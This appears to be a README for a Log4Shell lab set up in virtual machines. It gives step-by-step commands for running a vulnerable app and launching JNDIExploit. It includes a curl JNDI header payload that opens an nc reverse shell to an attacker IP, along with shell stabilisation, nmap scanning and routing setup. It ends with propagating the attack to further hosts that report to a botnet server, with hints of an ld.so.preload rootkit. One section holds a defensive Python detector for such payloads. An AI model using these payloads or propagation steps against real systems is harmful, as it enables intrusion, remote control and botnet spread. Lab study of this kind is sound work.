- Install Java JDK 1.8.0_20. Download from: https://www.oracle.com/es/java/technologies/javase/javase8-archive-downloads.html
- For 64-bit Linux, download "jdk-8u20-linux-x64.tar.gz".
- Extract the archive to the Desktop.
- Add the JDK to the PATH: export PATH=/home/kali/Desktop/jdk1.8.0_20/bin:$PATH
- Check that the Java version is "1.8.0_20" with the following command:
java -version
- Open the app folder.
- Execute the following command:
java -jar log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar
If you want to customize and build the server, you can follow these steps:
- Install gradle 7.3.1.
- Create the directory "/home/gradle/src".
- Put all the files from the repo https://github.com/christophetd/log4shell-vulnerable-app into that directory.
- Install Java JDK 1.8.0_20. Download from: https://www.oracle.com/es/java/technologies/javase/javase8-archive-downloads.html
- For 64-bit Linux, download "jdk-8u20-linux-x64.tar.gz".
- Extract the archive to the Desktop.
- Add the JDK to the PATH: export PATH=/home/kali/Desktop/jdk1.8.0_20/bin:$PATH
- Check that the Java version is "1.8.0_20" with the following command:
java -version
- Go to "/home/gradle/src".
- Build the jar:
gradle bootJar --no-daemon
- Execute the vulnerable webserver: java -jar .jar
- Attacker: 10.0.2.9
- Victim: 10.0.2.10
- Run the vulnerable webserver on the victim machine: follow the steps of the "Simulate the vulnerable server" section above.
- Listen with nc on the attacker machine: nc -lvp 4444 -n
- On the attacker machine, execute the exploit, which starts the LDAP server:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 10.0.2.9 -p 8888
- Send the following payload from the attacker machine to the vulnerable machine:
curl 10.0.2.10:8080 -H 'X-Api-Version: ${jndi:ldap://10.0.2.9:1389/Basic/Command/Base64/bmMgMTAuMC4yLjkgNDQ0NCAtZSAvYmluL2Jhc2g=}'
- The previous payload executes the following command on the victim: "nc 10.0.2.9 4444 -e /bin/bash". If you want to change the command, encode it in base64 and send the following payload:
curl 10.0.2.10:8080 -H 'X-Api-Version: ${jndi:ldap://10.0.2.9:1389/Basic/Command/Base64/<base64-encoded-command>}'
Exploit source: https://github.com/welk1n/JNDI-Injection-Exploit
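A defender-side triage helper, added here as an example and not part of this lab or of the JNDIExploit project: it flags HTTP header values that contain the literal ${jndi:...} lookup shown above and decodes the Base64 command segment of the JNDIExploit "Basic/Command/Base64" path, so an analyst reviewing request logs can see what the callback would have run. The sample header values are constructed, and the pattern matches only the literal lookup form used in this lab.

```python
import base64
import re

# Constructed sample header values, modelled on the lab payload above (not real traffic).
SAMPLE_HEADERS = {
    "benign": "1.2.3",
    "lab_payload": "${jndi:ldap://10.0.2.9:1389/Basic/Command/Base64/"
                   "bmMgMTAuMC4yLjkgNDQ0NCAtZSAvYmluL2Jhc2g=}",
}

# Literal "${jndi:<scheme>://<host>[:<port>][/<path>]}" lookup, as written in this lab.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)"
    r"(?::(?P<port>\d+))?(?P<path>/[^}]*)?\}",
    re.IGNORECASE,
)
# JNDIExploit's "/Basic/Command/Base64/<b64>" path carries the command to execute.
B64_CMD_RE = re.compile(r"/Basic/Command/Base64/(?P<b64>[A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_command(path):
    """Return the Base64-decoded command from a JNDIExploit-style path, or None."""
    m = B64_CMD_RE.search(path or "")
    if not m:
        return None
    try:
        return base64.b64decode(m.group("b64"), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error (bad padding / alphabet) is a ValueError
        return None


def inspect_header(value):
    """Triage one header value: None if clean, else a dict describing the callback."""
    m = JNDI_RE.search(value)
    if not m:
        return None
    return {
        "scheme": m.group("scheme").lower(),
        "host": m.group("host"),
        "port": int(m.group("port")) if m.group("port") else None,
        "command": decode_command(m.group("path")),
    }


def triage(headers):
    """Return only the headers that contain a JNDI lookup, each with its triage info."""
    return {name: info for name, value in headers.items()
            if (info := inspect_header(value)) is not None}
```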
- Stabilize the netcat shell on the attacker's listener:
python3 -c "import pty; pty.spawn('/bin/bash')"
CTRL+Z
stty raw -echo;fg
id
Source: https://ice-wzl.medium.com/netcat-shell-stabilization-248b83bcc06c
- Get the network interfaces: ifconfig
- Scan the whole subnet for live hosts: nmap -sn 192.168.1.0/24
- Port scan to detect whether a host may be running the vulnerable app: "nmap -v 192.168.1.10" or "nmap -v -p- 192.168.1.10" (all ports)
- Log4Shell scanners:
https://github.com/giterlizzi/nmap-log4shell
https://github.com/adilsoybali/Log4j-RCE-Scanner
IP: 10.0.2.9
- Malicious LDAP and HTTP server listening on port 8888.
- Botnet server listening on port 9090.
IP: 10.0.2.10
IP: 10.0.3.4
- Vulnerable webserver listening on port 8080.
IP: 10.0.3.5
- Vulnerable webserver listening on port 8080.
Default gateway via router:
sudo ip route add default via 10.0.2.10
Enable IPv4 forwarding: edit /etc/sysctl.conf and uncomment the line net.ipv4.ip_forward=1
Enable NAT (list the current NAT rules, flush them, set the default route and masquerade on eth1):
sudo iptables -t nat -L -n -v --line-numbers
sudo iptables -t nat -F
sudo ip route add default via 10.0.3.1
sudo iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
Default gateway via router:
sudo ip route add default via 10.0.3.4
- Start the LDAP and HTTP server in VM1:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 10.0.2.9 -p 8888
- Start the vulnerable server in VM2:
java -jar log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar
- Start the vulnerable server in VM3:
java -jar log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar
- Execute propagation.py in VM1:
python propagation.py
- Check that you have two connections on the VM1 botnet server.
Clear the ld.so.preload entry and remove the dropped /tmp/.bflix directory:
echo "" | sudo tee /etc/ld.so.preload
sudo rm -r /tmp/.bflix